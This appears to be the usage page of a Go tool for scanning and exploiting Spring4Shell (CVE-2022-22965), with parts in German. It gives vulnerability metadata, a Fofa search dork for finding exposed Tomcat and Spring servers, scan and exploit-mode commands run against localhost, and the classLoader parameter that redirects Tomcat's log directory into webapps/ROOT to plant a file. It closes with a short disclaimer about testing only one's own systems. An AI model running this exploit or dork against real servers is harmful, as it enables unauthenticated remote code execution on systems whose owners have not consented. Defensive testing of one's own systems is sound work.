
Spring4Shell (CVE-2022-22965)
Spring4Shell (CVE-2022-22965)
❯ go run main.go -s
[INF] VulnInfo:
{
"Name": "CVE-2022-22965",
"VulID": "nil",
"Version": "1.0",
"Author": "",
"VulDate": "2022-03-30",
"References": [
"https://nosec.org/home/detail/4983.html"
],
"AppName": "Spring Core",
"AppPowerLink": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement",
"AppVersion": "All",
"VulType": "RCE",
"Description": "Ein nicht authentifizierter Angreifer kann diese Schwachstelle nutzen, um Remote-Code-Ausführung durchzuführen. Die Schwachstelle ist im Spring-Framework und abgeleiteten Frameworks weit verbreitet und betrifft JDK 9.0 und höher.",
"Category": "REMOTE",
"Dork": {
"Fofa": "app=\"APACHE-Tomcat\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-Spring-Batch\" || app=\"vmware-Spring-framework\" || app=\"vmware-Spring-Security\"",
"Quake": "",
"Zoomeye": "",
"Shodan": ""
}
}%
echo http://127.0.0.1:8181/ | go run main.go -v -t 20
http://127.0.0.1:8181/
echo http://127.0.0.1:8181/ | go run main.go -m exploit -v
Möglicherweise muss der Datei-Upload-Pfad geändert werden; standardmäßig ist er "webapps/ROOT"
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT/
Dieses Verfahren dient nur der eigenen Sicherheitsüberprüfung. Bitte halten Sie sich bewusst an die örtlichen Gesetze.